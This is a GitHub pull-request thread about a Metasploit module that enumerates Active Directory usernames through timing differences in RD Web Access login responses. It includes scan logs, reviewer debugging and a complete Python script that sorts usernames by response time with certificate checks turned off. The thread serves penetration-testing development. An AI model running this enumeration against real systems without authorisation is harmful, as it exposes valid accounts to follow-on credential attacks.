192.168.134.140 192.168.134.140 443/tcp (RDWeb) shutdown
192.168.134.140 192.168.134.140 443/tcp (RDWeb) sigver
192.168.134.140 192.168.134.140 443/tcp (RDWeb) speech-dispatcher
192.168.134.140 192.168.134.140 443/tcp (RDWeb) sshd
192.168.134.140 192.168.134.140 443/tcp (RDWeb) sslh
192.168.134.140 192.168.134.140 443/tcp (RDWeb) sssd
192.168.134.140 192.168.134.140 443/tcp (RDWeb) stunnel4
192.168.134.140 192.168.134.140 443/tcp (RDWeb) sym
192.168.134.140 192.168.134.140 443/tcp (RDWeb) symop
192.168.134.140 192.168.134.140 443/tcp (RDWeb) sync
192.168.134.140 192.168.134.140 443/tcp (RDWeb) sys
192.168.134.140 192.168.134.140 443/tcp (RDWeb) sysadm
192.168.134.140 192.168.134.140 443/tcp (RDWeb) sysadmin
192.168.134.140 192.168.134.140 443/tcp (RDWeb) sysbin
192.168.134.140 192.168.134.140 443/tcp (RDWeb) syslog
192.168.134.140 192.168.134.140 443/tcp (RDWeb) system_admin
192.168.134.140 192.168.134.140 443/tcp (RDWeb) systemd-bus-proxy
192.168.134.140 192.168.134.140 443/tcp (RDWeb) systemd-coredump
192.168.134.140 192.168.134.140 443/tcp (RDWeb) systemd-network
192.168.134.140 192.168.134.140 443/tcp (RDWeb) systemd-resolve
192.168.134.140 192.168.134.140 443/tcp (RDWeb) systemd-timesync
192.168.134.140 192.168.134.140 443/tcp (RDWeb) tcpdump
192.168.134.140 192.168.134.140 443/tcp (RDWeb) trouble
192.168.134.140 192.168.134.140 443/tcp (RDWeb) tss
192.168.134.140 192.168.134.140 443/tcp (RDWeb) udadmin
192.168.134.140 192.168.134.140 443/tcp (RDWeb) ultra
192.168.134.140 192.168.134.140 443/tcp (RDWeb) umountfs
192.168.134.140 192.168.134.140 443/tcp (RDWeb) umountfsys
192.168.134.140 192.168.134.140 443/tcp (RDWeb) umountsys
192.168.134.140 192.168.134.140 443/tcp (RDWeb) unix
192.168.134.140 192.168.134.140 443/tcp (RDWeb) unscd
192.168.134.140 192.168.134.140 443/tcp (RDWeb) us_admin
192.168.134.140 192.168.134.140 443/tcp (RDWeb) usbmux
192.168.134.140 192.168.134.140 443/tcp (RDWeb) user
192.168.134.140 192.168.134.140 443/tcp (RDWeb) uucp
192.168.134.140 192.168.134.140 443/tcp (RDWeb) uucpadm
192.168.134.140 192.168.134.140 443/tcp (RDWeb) uuidd
192.168.134.140 192.168.134.140 443/tcp (RDWeb) vagrant
192.168.134.140 192.168.134.140 443/tcp (RDWeb) varnish
192.168.134.140 192.168.134.140 443/tcp (RDWeb) web
192.168.134.140 192.168.134.140 443/tcp (RDWeb) webmaster
192.168.134.140 192.168.134.140 443/tcp (RDWeb) whoopsie
192.168.134.140 192.168.134.140 443/tcp (RDWeb) www
192.168.134.140 192.168.134.140 443/tcp (RDWeb) www-data
192.168.134.140 192.168.134.140 443/tcp (RDWeb) xpdb
192.168.134.140 192.168.134.140 443/tcp (RDWeb) xpopr
192.168.134.140 192.168.134.140 443/tcp (RDWeb) zabbix

msf6 auxiliary(scanner/http/rdp_web_login) >

</details>

@k0pak4
Contributor Author

k0pak4 commented Jan 20, 2021

@bwatters-r7 thanks for the feedback and for going through the testing! I also tested a 2016 DC so it's nice to see it works there as well. As for the three items:

  • I'm also not sure how the module should act when there is no connection. I can see if I can get a different error code with a service that doesn't exist vs one that does but times out. I'm currently doing a try/except with the request timeout but I can see if I can get a differentiation. I'd also be happy if you had more direction on what it should do though, since I'm also not familiar with what the proper behavior would be. If I can differentiate, that does feel better though right?
  • On the successful run, do you have a suggestion as to how I can get the realm (domain) added properly? I made an attempt to do so when I add the credential but it isn't getting added and I'm not sure where I'm going wrong
  • So this behavior is slightly expected I guess because the default timeout is from testing against an internet hosted service. When I test against a local DC, you need to set the timeout much lower. In my screenshot above I did this against a 2019 Windows Server. Are you hosting RD Web on the same server as your DC? It might make the time difference more negligible. In my setup I have two Windows 2019 Servers, one is the DC and the other is hosting RDWeb (all virtual machines).

@k0pak4
Contributor Author

k0pak4 commented Jan 20, 2021

@bwatters-r7 I did some more investigation into your problems with the long user list. I can recreate the issue when the password is blank, but making it any string fixes it. I ran through this with the module and in BurpSuite and it appears that when authentication attempts with blank passwords are made, the timing attack is ineffective. I didn't notice it initially, because I have the password default to 'wrong'. When any string is put into the password field, the timing discrepancies appear again.

@bwatters-r7
Contributor

Let me try to give you some more info; I may have glossed over some things, and also I don't have the depth of knowledge on some aspects of this technique.

For the timeout case, it looks like if you get the response 302, the password and username are good (successful), if you get the response 200, the password is invalid, but the username is valid. We'd assume that a timeout was a separate issue? Therefore, I would propose to simply pass the exception through like https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ssl/bleichenbacher_oracle.py#L154
There, in the case of a timeout, it just returns the string "Timeout waiting for alert". In this case, maybe just "timeout error".

I can't do too much about the domain reporting without doing a lot more digging. @acammack-r7 might be able to chime in quick, but otherwise, I'll start digging.

@k0pak4
Contributor Author

k0pak4 commented Jan 22, 2021

Let me try to give you some more info; I may have glossed over some things, and also I don't have the depth of knowledge on some aspects of this technique.

For the timeout case, it looks like if you get the response 302, the password and username are good (successful), if you get the response 200, the password is invalid, but the username is valid. We'd assume that a timeout was a separate issue? Therefore, I would propose to simply pass the exception through like https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ssl/bleichenbacher_oracle.py#L154
There, in the case of a timeout, it just returns the string "Timeout waiting for alert". In this case, maybe just "timeout error".

I can't do too much about the domain reporting without doing a lot more digging. @acammack-r7 might be able to chime in quick, but otherwise, I'll start digging.

Interesting, the module you referenced is using raw sockets though where I'm using the requests library. So the idea was that rather than wait for the response and then check that it is passed the user set threshold, that by using a requests timeout the module would be faster. In my initial testing, invalid authentication attempts were taking over 4 seconds, whereas valid usernames take around 200 milliseconds. Thus, I set up the auth to go like the following:

  1. If we get a response that's a 302, it's a valid login pair
  2. If we get a response within the timeout threshold, it's a valid username
  3. If we timeout the response, it's an invalid username

I could change it to the following:

  1. If we get a response that's a 302, it's a valid login pair
  2. If we get a response within the timeout threshold, it's a valid username
  3. If we get a response outside the timeout threshold, it's an invalid username
  4. If we timeout the response, the host is down.

This does have a drawback because it will bloat the overall scan times, since we don't need to wait the full amount of time for every response just to compare it to a timeout threshold. In the initial example I was working with, where I set the threshold to 1500 milliseconds, this change would up every invalid username scanned from 1.5s to 4s, which is fairly significant. This problem is compounded by the fact that the requests library doesn't have a default timeout and will hang indefinitely, so I'd need to set something as the timeout anyway to determine if the host is down. If you think the second approach is better I can change it to that, but maybe it would be better to just do an initial check to see if the host is up before initiating the scan? Then we could leave it as a quicker scan, but alleviate concerns of reporting a bunch of invalid usernames when the host is just down.
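The three-way decision described in the comment above (302 means a valid username and password pair, a quick non-redirect answer means a valid username, a timeout means an unknown username), together with the service pre-check it proposes, as an added example written for this page. It is not the PR's module code: it uses only the Python standard library instead of requests, so it runs without extra packages. The form field names `DomainUserName` and `UserPass`, the `fake_post` offline transport, and all helper names are assumptions made here, not taken from the module. It also folds in two pitfalls recorded elsewhere in this thread: a blank password erases the timing gap, so it is rejected, and certificate verification is disabled because lab RDWeb hosts commonly use self-signed certificates.

```python
"""Timing-based RDWeb username check following the decision rules above."""
import socket
import ssl
import sys
import time
import urllib.error
import urllib.parse
import urllib.request

VALID_PAIR = "valid_pair"      # 302: username and password both accepted
VALID_USER = "valid_user"      # quick non-redirect answer: user exists, password wrong
INVALID_USER = "invalid_user"  # slow answer or timeout: user unknown to the domain
DEFAULT_UA = "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0"


def classify(status_code, elapsed_ms, timeout_ms, timed_out):
    """Map one attempt to an outcome; works with a hard request timeout or a measured time."""
    if timed_out:
        return INVALID_USER
    if status_code == 302:
        return VALID_PAIR
    if elapsed_ms < timeout_ms:
        return VALID_USER
    return INVALID_USER


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Do not follow 302s: the redirect itself is the success signal."""
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def _opener():
    # Self-signed lab certificates: skip verification, the equivalent of verify=False.
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    return urllib.request.build_opener(
        urllib.request.HTTPSHandler(context=ctx), _NoRedirect)


def http_post(url, form, timeout_s, user_agent=DEFAULT_UA):
    """POST the form and return the HTTP status; raise TimeoutError on timeout."""
    req = urllib.request.Request(url, data=urllib.parse.urlencode(form).encode(),
                                 headers={"User-Agent": user_agent})
    try:
        with _opener().open(req, timeout=timeout_s) as resp:
            return resp.status
    except urllib.error.HTTPError as err:
        return err.code  # unfollowed 302, 401, 5xx: all carry a status
    except socket.timeout as err:  # read timeout surfaces unwrapped
        raise TimeoutError(f"no response in {timeout_s}s") from err
    except urllib.error.URLError as err:  # connect timeout arrives wrapped
        if isinstance(err.reason, socket.timeout):
            raise TimeoutError(f"no response in {timeout_s}s") from err
        raise  # connection refused, TLS failure: let the caller see it


def fake_post(status=None, timeout=False):
    """Constructed offline transport (assumption): fixed status, or a simulated timeout."""
    def post(url, form, timeout_s):
        if timeout:
            raise TimeoutError("simulated timeout")
        return status
    return post


def service_up(url, timeout_ms, post=http_post):
    """Pre-flight check so a dead host is not reported as a list of invalid users."""
    try:
        post(url, {}, timeout_ms / 1000.0)  # any HTTP answer at all will do
        return True
    except (TimeoutError, OSError):
        return False


def check_username(url, domain, username, password, timeout_ms, post=http_post):
    """Return (outcome, elapsed_ms) for one DOMAIN\\user attempt."""
    if not password:
        # With a blank password the timing gap disappears, as noted in the thread.
        raise ValueError("password must be non-empty (the module defaults to 'wrong')")
    form = {"DomainUserName": f"{domain}\\{username}", "UserPass": password}
    start = time.monotonic()
    try:
        status, timed_out = post(url, form, timeout_ms / 1000.0), False
    except TimeoutError:
        status, timed_out = None, True
    elapsed_ms = (time.monotonic() - start) * 1000.0
    return classify(status, elapsed_ms, timeout_ms, timed_out), elapsed_ms


if __name__ == "__main__":
    # python rdweb_timing.py https://HOST/RDWeb/Pages/en-US/login.aspx DOMAIN user...
    url, domain, users = sys.argv[1], sys.argv[2], sys.argv[3:]
    if not service_up(url, 2000):
        sys.exit("service appears to be down")
    for user in users:
        outcome, ms = check_username(url, domain, user, "wrong", 1250)
        print(f"{domain}\\{user}: {outcome} ({ms:.1f} ms)")
```

The `post` parameter is injectable so the decision logic can be exercised offline with `fake_post`; against a real host, `http_post` raises `TimeoutError` only for timeouts and lets connection and TLS failures propagate, which is what lets `service_up` tell a down host apart from a slow domain controller.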

@bwatters-r7
Contributor

bwatters-r7 commented Jan 22, 2021

I think I've started this reply a half dozen times.

First, I appreciate the breakdown you gave above, it really helped me understand what was happening.

Second, I think we should give the user control over the timeout somehow. Different networks will behave differently, so I could see edge cases where users should be able to control the timeout. Likely that would be more of an advanced option with the default values you have found work correctly.

Third, I really like your idea of checking the service first. Maybe you could add a boolean option called verify_service defaulting to true that would just fire a quick check to catch people like me who did not verify the service before scanning?

I still owe you an answer on the domain thing, but that's unlikely to come for a couple days.

@bwatters-r7
Contributor

Roger. I'll try to move the RDP web server to a different VM in the network so I can test.

@bwatters-r7
Contributor

I'm having some trouble checking this again. I added a new 2016 server to my domain and added the web rdp service to it, but I'm getting an error when I try to scan both the new target and the old DC (still running a web rdp client).
The new server is 192.168.132.184, the old one is 192.168.132.170:

msf6 auxiliary(scanner/http/rdp_web_login) > show options

Module options (auxiliary/scanner/http/rdp_web_login):

   Name            Current Setting                                                       Required  Description
   ----            ---------------                                                       --------  -----------
   RHOSTS          192.168.132.170                                                       yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   THREADS         1                                                                     yes       The number of concurrent threads (max one per host)
   domain          testdomain                                                            no        The target AD domain
   enum_domain     true                                                                  no        Automatically enumerate AD domain using NTLM
   password                                                                              no        The password to try or path to a file of passwords
   rport           443                                                                   yes       Port to target
   targeturi       /RDWeb/Pages/en-US/login.aspx                                         yes       The base path to the RDP Web Client install
   timeout         2000                                                                  yes       Response timeout in milliseconds to consider username invalid
   user_agent      Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0  no        User Agent string to use, defaults to Firefox
   username        Administrator                                                         yes       The username to verify or path to a file of usernames
   verify_service  true                                                                  no        Verify the service is up before performing login scan

msf6 auxiliary(scanner/http/rdp_web_login) > run

[*] Running for 192.168.132.170...
[*] 192.168.132.170 - Starting new HTTPS connection (%d): %s:%s
[-] HTTPSConnectionPool(host='192.168.132.170', port=443): Max retries exceeded with url: //RDWeb/Pages/en-US/login.aspx (Caused by SSLError(SSLError("bad handshake: Error([('SSL routines', 'tls_process_server_certificate', 'certificate verify failed')])")))
[-] Service appears to be down, no response in 2000 milliseconds
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/rdp_web_login) > set rhosts 192.168.132.184
rhosts => 192.168.132.184
msf6 auxiliary(scanner/http/rdp_web_login) > run

[*] Running for 192.168.132.184...
[*] 192.168.132.184 - Starting new HTTPS connection (%d): %s:%s
[-] HTTPSConnectionPool(host='192.168.132.184', port=443): Max retries exceeded with url: //RDWeb/Pages/en-US/login.aspx (Caused by SSLError(SSLError("bad handshake: Error([('SSL routines', 'tls_process_server_certificate', 'certificate verify failed')])")))
[-] Service appears to be down, no response in 2000 milliseconds
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/rdp_web_login) > 

When I navigate to the server from firefox on the host running metasploit, I get the "untrusted cert error," but I can get to the login just fine:
[screenshot: the RDWeb login page, reached after accepting the untrusted certificate warning]

Kind of odd the cert error is suddenly creeping in. I don't suppose this is something you've run into?

@k0pak4
Contributor Author

k0pak4 commented Jan 29, 2021

@bwatters-r7 I haven't run into this SSL cert issue, no. I don't think my most recent set of changes should have caused this either, since I just introduced the user_agent variable in order to get around a new host I was targeting that only allowed certain user agents 🤔

@bwatters-r7
Contributor

When I drop back to b962f41, it works again without the cert error:

msf6 auxiliary(scanner/http/rdp_web_login) > set rhosts 192.168.132.170
rhosts => 192.168.132.170
msf6 auxiliary(scanner/http/rdp_web_login) > run

[*] Running for 192.168.132.170...
[+] Service is up, beginning scan...
[+] Password  is invalid but testdomain\Administrator is valid! Response received in 40.551 milliseconds
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/rdp_web_login) > set rhosts 192.168.132.184
rhosts => 192.168.132.184
msf6 auxiliary(scanner/http/rdp_web_login) > run

[*] Running for 192.168.132.184...
[+] Service is up, beginning scan...
[+] Password  is invalid but testdomain\Administrator is valid! Response received in 51.449 milliseconds
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/rdp_web_login) > 

@k0pak4
Contributor Author

k0pak4 commented Jan 29, 2021

@bwatters-r7 I see where I went wrong, thanks for helping identify this. I had removed the verify=False from the service verification step. I hadn't noticed because I was testing against valid certs. Thanks for finding this! That part should be fixed in the most recent commit

@bwatters-r7
Contributor

Sweet! I was staring at those user strings, but I did not catch that.

msf6 auxiliary(scanner/http/rdp_web_login) > show options

Module options (auxiliary/scanner/http/rdp_web_login):

   Name            Current Setting                                                       Required  Description
   ----            ---------------                                                       --------  -----------
   RHOSTS          192.168.132.184                                                       yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   THREADS         1                                                                     yes       The number of concurrent threads (max one per host)
   domain          testdomain                                                            no        The target AD domain
   enum_domain     true                                                                  no        Automatically enumerate AD domain using NTLM
   password                                                                              no        The password to try or path to a file of passwords
   rport           443                                                                   yes       Port to target
   targeturi       /RDWeb/Pages/en-US/login.aspx                                         yes       The base path to the RDP Web Client install
   timeout         1250                                                                  yes       Response timeout in milliseconds to consider username invalid
   user_agent      Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0  no        User Agent string to use, defaults to Firefox
   username        Administrator                                                         yes       The username to verify or path to a file of usernames
   verify_service  true                                                                  no        Verify the service is up before performing login scan

msf6 auxiliary(scanner/http/rdp_web_login) > run

[*] Running for 192.168.132.184...
[*] 192.168.132.184 - Starting new HTTPS connection (%d): %s:%s
[*] 192.168.132.184 - %s://%s:%s "%s %s %s" %s %s
[+] Service is up, beginning scan...
[*] 192.168.132.184 - Starting new HTTPS connection (%d): %s:%s
[*] 192.168.132.184 - %s://%s:%s "%s %s %s" %s %s
[+] Password wrong is invalid but testdomain\Administrator is valid! Response received in 53.609 milliseconds
[!] No active DB -- Credential data will not be saved!
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/rdp_web_login) > set rhosts 192.168.132.170
rhosts => 192.168.132.170
msf6 auxiliary(scanner/http/rdp_web_login) > run

[*] Running for 192.168.132.170...
[*] 192.168.132.170 - Starting new HTTPS connection (%d): %s:%s
[*] 192.168.132.170 - %s://%s:%s "%s %s %s" %s %s
[+] Service is up, beginning scan...
[*] 192.168.132.170 - Starting new HTTPS connection (%d): %s:%s
[*] 192.168.132.170 - %s://%s:%s "%s %s %s" %s %s
[+] Password wrong is invalid but testdomain\Administrator is valid! Response received in 60.73 milliseconds
[!] No active DB -- Credential data will not be saved!
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/rdp_web_login) > 

@bwatters-r7
Contributor

Still curious about those weird print format statements. Also, did you ever get the answer on adding the domain to the datastore?

@k0pak4
Contributor Author

k0pak4 commented Jan 29, 2021

Still curious about those weird print format statements. Also, did you ever get the answer on adding the domain to the datastore?

I tried investigating the print format statements and couldn't find them anywhere in the library, which I found strange. It could just be my greps weren't good enough. And I haven't gotten the answer on the domain either. I felt like I added it right, but for some reason wasn't getting any errors when I added it but it still wasn't showing up in the db. I thought my changes to external.rb would do it, but it hasn't worked

@bwatters-r7
Contributor

So I threw out a quick question to the team and got a PR back for the log issue:
#14684

@k0pak4
Contributor Author

k0pak4 commented Jan 29, 2021

So I threw out a quick question to the team and got a PR back for the log issue:
#14684

Oh wow that's great! Thanks!

Comment on lines 156 to 157
credential_data[:public_data] = data['domain']
credential_data[:public_type] = :realm
Contributor

Instead of changing the credential type, I think this just needs to add a realm to the credential data:

Suggested change
credential_data[:public_data] = data['domain']
credential_data[:public_type] = :realm
credential_data[:realm] = data['domain']

Contributor Author

@k0pak4 k0pak4 Feb 4, 2021

I just tried this, but it doesn't seem to work either. I'm wondering if the create_credential function called at the end isn't handling the realm after it's added or something, or if I'm still passing it in incorrectly. I've tried adding it with :realm_key as well because I saw that as I was searching, but it didn't seem to work either.

Edit: I've verified I'm sending the 'domain' in the json:
{'domain': 'DUNN', 'address': '192.168.148.128', 'port': '443', 'protocol': 'tcp', 'service_name': 'RDWeb', 'username': 'k0pak4'} but for some reason the realm isn't sticking even with the suggested change

@@ -152,6 +152,11 @@ def handle_credential_login(data, mod)
credential_data[:private_type] = :password
end

if data.has_key?(:domain)
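Review bot: `data.has_key?(:domain)` at the end of this hunk tests for a symbol key, but `data` is the decoded hash whose keys are strings (the same code reads `data['domain']` elsewhere), so the new branch never executes; change it to `data.key?('domain')`, `key?` being the idiomatic spelling of `has_key?`. It would also help to document which keys an external module has to send for the realm to be stored, since the thread later finds that `:realm_key` and `:realm_value`, not `:realm`, are what make the domain show up in the credential.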
Contributor

My apologies, this will also need to be changed since all keys in data are strings:

Suggested change
if data.has_key?(:domain)
if data.has_key?('domain')

Contributor Author

So this isn't working either (though it could be an issue). When I remove the conditional completely, and just blindly add it to the credential_data, it still isn't appearing in the creds database as a realm. I've tried this multiple ways, including:

  • credential_data.merge({realm: data['domain']})
  • credential_data[:realm] = data['domain']

So I'm not sure why it isn't getting added at this point 😕

Contributor Author

@acammack-r7 I got it! It turns out the fix was using :realm_key and :realm_value. I then added this to password reporting, since it didn't exist there either. This should be good to go now!

@k0pak4
Contributor Author

k0pak4 commented Feb 17, 2021

@acammack-r7 @bwatters-r7 I'm finished with requested updates now with the domain reporting complete. I updated the documentation to reflect the module updates as well, and have rerun msftidy on the docs to verify compliance as well as running pylint on the created module. Let me know what else I can do to help get this ready for approval

@bwatters-r7
Contributor

Hi there, @k0pak4 ! Thanks so much for the updates.
Unfortunately, some of our team (myself included) were in the path of the winter storm that just hit the US, so we're dealing with unreliable and intermittent power outages around us. That means most of my infrastructure for testing is offline to make room on the grid for more important things and to protect the hardware from fluctuations.
I'm sorry to say that means that this will probably sit around until next week when I can power on the test range again.
Thanks again for being patient and awesome through this whole process!

@k0pak4
Contributor Author

k0pak4 commented Feb 18, 2021

@bwatters-r7 no worries! Keep yourself and the team safe! This will still be here afterwards 🙂

@bwatters-r7
Contributor

OK; back up and running. Now, I'm still not getting the timing. I've got the web_rdp running on a separate VM from the DC, and the timing just does not seem to be there:

Output
msf6 auxiliary(scanner/http/rdp_web_login) > run

[*] Running for 192.168.132.184...
[+] Service is up, beginning scan...
[+] Password wrong is invalid but testdomain\ is valid! Response received in 72.419 milliseconds
[+] Password wrong is invalid but testdomain\4Dgifts is valid! Response received in 62.009 milliseconds
[+] Password wrong is invalid but testdomain\abrt is valid! Response received in 75.359 milliseconds
[+] Password wrong is invalid but testdomain\adm is valid! Response received in 96.745 milliseconds
[+] Password wrong is invalid but testdomain\admin is valid! Response received in 71.325 milliseconds
[+] Password wrong is invalid but testdomain\administrator is valid! Response received in 76.675 milliseconds
[+] Password wrong is invalid but testdomain\anon is valid! Response received in 77.206 milliseconds
[+] Password wrong is invalid but testdomain\_apt is valid! Response received in 75.6 milliseconds
[+] Password wrong is invalid but testdomain\arpwatch is valid! Response received in 75.787 milliseconds
[+] Password wrong is invalid but testdomain\auditor is valid! Response received in 75.818 milliseconds
[+] Password wrong is invalid but testdomain\avahi is valid! Response received in 76.057 milliseconds
[+] Password wrong is invalid but testdomain\avahi-autoipd is valid! Response received in 75.794 milliseconds
[+] Password wrong is invalid but testdomain\backup is valid! Response received in 61.143 milliseconds
[+] Password wrong is invalid but testdomain\bbs is valid! Response received in 61.98 milliseconds
[+] Password wrong is invalid but testdomain\beef-xss is valid! Response received in 75.382 milliseconds
[+] Password wrong is invalid but testdomain\bin is valid! Response received in 61.005 milliseconds
[+] Password wrong is invalid but testdomain\bitnami is valid! Response received in 61.717 milliseconds
[+] Password wrong is invalid but testdomain\checkfs is valid! Response received in 76.276 milliseconds
[+] Password wrong is invalid but testdomain\checkfsys is valid! Response received in 75.645 milliseconds
[+] Password wrong is invalid but testdomain\checksys is valid! Response received in 72.031 milliseconds
[+] Password wrong is invalid but testdomain\chronos is valid! Response received in 63.759 milliseconds
[+] Password wrong is invalid but testdomain\chrony is valid! Response received in 70.705 milliseconds
[+] Password wrong is invalid but testdomain\cmwlogin is valid! Response received in 62.248 milliseconds
[+] Password wrong is invalid but testdomain\cockpit-ws is valid! Response received in 74.928 milliseconds
[+] Password wrong is invalid but testdomain\colord is valid! Response received in 74.915 milliseconds
[+] Password wrong is invalid but testdomain\couchdb is valid! Response received in 83.786 milliseconds
[+] Password wrong is invalid but testdomain\cups-pk-helper is valid! Response received in 81.807 milliseconds
[+] Password wrong is invalid but testdomain\daemon is valid! Response received in 61.281 milliseconds
[+] Password wrong is invalid but testdomain\dbadmin is valid! Response received in 61.532 milliseconds
[+] Password wrong is invalid but testdomain\dbus is valid! Response received in 74.472 milliseconds
[+] Password wrong is invalid but testdomain\Debian-exim is valid! Response received in 77.66 milliseconds
[+] Password wrong is invalid but testdomain\Debian-snmp is valid! Response received in 76.153 milliseconds
[+] Password wrong is invalid but testdomain\demo is valid! Response received in 72.914 milliseconds
[+] Password wrong is invalid but testdomain\demos is valid! Response received in 75.501 milliseconds
[+] Password wrong is invalid but testdomain\diag is valid! Response received in 64.232 milliseconds
[+] Password wrong is invalid but testdomain\distccd is valid! Response received in 85.201 milliseconds
[+] Password wrong is invalid but testdomain\dni is valid! Response received in 59.86 milliseconds
[+] Password wrong is invalid but testdomain\dnsmasq is valid! Response received in 60.477 milliseconds
[+] Password wrong is invalid but testdomain\dradis is valid! Response received in 65.41 milliseconds
[+] Password wrong is invalid but testdomain\EZsetup is valid! Response received in 68.37 milliseconds
[+] Password wrong is invalid but testdomain\fal is valid! Response received in 62.103 milliseconds
[+] Password wrong is invalid but testdomain\fax is valid! Response received in 58.928 milliseconds
[+] Password wrong is invalid but testdomain\ftp is valid! Response received in 73.531 milliseconds
[+] Password wrong is invalid but testdomain\games is valid! Response received in 61.524 milliseconds
[+] Password wrong is invalid but testdomain\gdm is valid! Response received in 60.678 milliseconds
[+] Password wrong is invalid but testdomain\geoclue is valid! Response received in 58.809 milliseconds
[+] Password wrong is invalid but testdomain\gnats is valid! Response received in 59.547 milliseconds
[+] Password wrong is invalid but testdomain\gnome-initial-setup is valid! Response received in 68.724 milliseconds
[+] Password wrong is invalid but testdomain\gopher is valid! Response received in 68.163 milliseconds
[+] Password wrong is invalid but testdomain\gropher is valid! Response received in 58.576 milliseconds
[+] Password wrong is invalid but testdomain\guest is valid! Response received in 59.901 milliseconds
[+] Password wrong is invalid but testdomain\haldaemon is valid! Response received in 59.84 milliseconds
[+] Password wrong is invalid but testdomain\halt is valid! Response received in 61.234 milliseconds
[+] Password wrong is invalid but testdomain\hplip is valid! Response received in 61.216 milliseconds
[+] Password wrong is invalid but testdomain\inetsim is valid! Response received in 72.135 milliseconds
[+] Password wrong is invalid but testdomain\informix is valid! Response received in 67.978 milliseconds
[+] Password wrong is invalid but testdomain\install is valid! Response received in 74.064 milliseconds
[+] Password wrong is invalid but testdomain\iodine is valid! Response received in 62.507 milliseconds
[+] Password wrong is invalid but testdomain\irc is valid! Response received in 72.521 milliseconds
[+] Password wrong is invalid but testdomain\jet is valid! Response received in 59.146 milliseconds
[+] Password wrong is invalid but testdomain\karaf is valid! Response received in 61.418 milliseconds
[+] Password wrong is invalid but testdomain\kernoops is valid! Response received in 60.47 milliseconds
[+] Password wrong is invalid but testdomain\king-phisher is valid! Response received in 59.808 milliseconds
[+] Password wrong is invalid but testdomain\landscape is valid! Response received in 74.429 milliseconds
[+] Password wrong is invalid but testdomain\libstoragemgmt is valid! Response received in 74.612 milliseconds
[+] Password wrong is invalid but testdomain\libuuid is valid! Response received in 60.887 milliseconds
[+] Password wrong is invalid but testdomain\lightdm is valid! Response received in 60.232 milliseconds
[+] Password wrong is invalid but testdomain\list is valid! Response received in 87.809 milliseconds
[+] Password wrong is invalid but testdomain\listen is valid! Response received in 63.717 milliseconds
[+] Password wrong is invalid but testdomain\lp is valid! Response received in 71.844 milliseconds
[+] Password wrong is invalid but testdomain\lpadm is valid! Response received in 61.202 milliseconds
[+] Password wrong is invalid but testdomain\lpadmin is valid! Response received in 58.721 milliseconds
[+] Password wrong is invalid but testdomain\lxd is valid! Response received in 59.793 milliseconds
[+] Password wrong is invalid but testdomain\lynx is valid! Response received in 61.583 milliseconds
[+] Password wrong is invalid but testdomain\mail is valid! Response received in 61.207 milliseconds
[+] Password wrong is invalid but testdomain\man is valid! Response received in 61.748 milliseconds
[+] Password wrong is invalid but testdomain\me is valid! Response received in 60.069 milliseconds
[+] Password wrong is invalid but testdomain\messagebus is valid! Response received in 61.996 milliseconds
[+] Password wrong is invalid but testdomain\miredo is valid! Response received in 60.31 milliseconds
[+] Password wrong is invalid but testdomain\mountfs is valid! Response received in 60.163 milliseconds
[+] Password wrong is invalid but testdomain\mountfsys is valid! Response received in 59.809 milliseconds
[+] Password wrong is invalid but testdomain\mountsys is valid! Response received in 61.959 milliseconds
[+] Password wrong is invalid but testdomain\mysql is valid! Response received in 61.404 milliseconds
[+] Password wrong is invalid but testdomain\news is valid! Response received in 73.184 milliseconds
[+] Password wrong is invalid but testdomain\noaccess is valid! Response received in 60.996 milliseconds
[+] Password wrong is invalid but testdomain\nobody is valid! Response received in 58.953 milliseconds
[+] Password wrong is invalid but testdomain\nobody4 is valid! Response received in 59.602 milliseconds
[+] Password wrong is invalid but testdomain\ntp is valid! Response received in 57.899 milliseconds
[+] Password wrong is invalid but testdomain\nuucp is valid! Response received in 62.16 milliseconds
[+] Password wrong is invalid but testdomain\nxautomation is valid! Response received in 59.224 milliseconds
[+] Password wrong is invalid but testdomain\nxpgsql is valid! Response received in 61.645 milliseconds
[+] Password wrong is invalid but testdomain\omi is valid! Response received in 60.653 milliseconds
[+] Password wrong is invalid but testdomain\omsagent is valid! Response received in 73.401 milliseconds
[+] Password wrong is invalid but testdomain\operator is valid! Response received in 58.553 milliseconds
[+] Password wrong is invalid but testdomain\oracle is valid! Response received in 61.405 milliseconds
[+] Password wrong is invalid but testdomain\OutOfBox is valid! Response received in 61.976 milliseconds
[+] Password wrong is invalid but testdomain\pi is valid! Response received in 60.435 milliseconds
[+] Password wrong is invalid but testdomain\polkitd is valid! Response received in 59.835 milliseconds
[+] Password wrong is invalid but testdomain\pollinate is valid! Response received in 59.942 milliseconds
[+] Password wrong is invalid but testdomain\popr is valid! Response received in 74.971 milliseconds
[+] Password wrong is invalid but testdomain\postfix is valid! Response received in 73.244 milliseconds
[+] Password wrong is invalid but testdomain\postgres is valid! Response received in 62.279 milliseconds
[+] Password wrong is invalid but testdomain\postmaster is valid! Response received in 58.509 milliseconds
[+] Password wrong is invalid but testdomain\printer is valid! Response received in 63.359 milliseconds
[+] Password wrong is invalid but testdomain\proxy is valid! Response received in 73.651 milliseconds
[+] Password wrong is invalid but testdomain\pulse is valid! Response received in 75.824 milliseconds
[+] Password wrong is invalid but testdomain\redsocks is valid! Response received in 78.72 milliseconds
[+] Password wrong is invalid but testdomain\rfindd is valid! Response received in 69.472 milliseconds
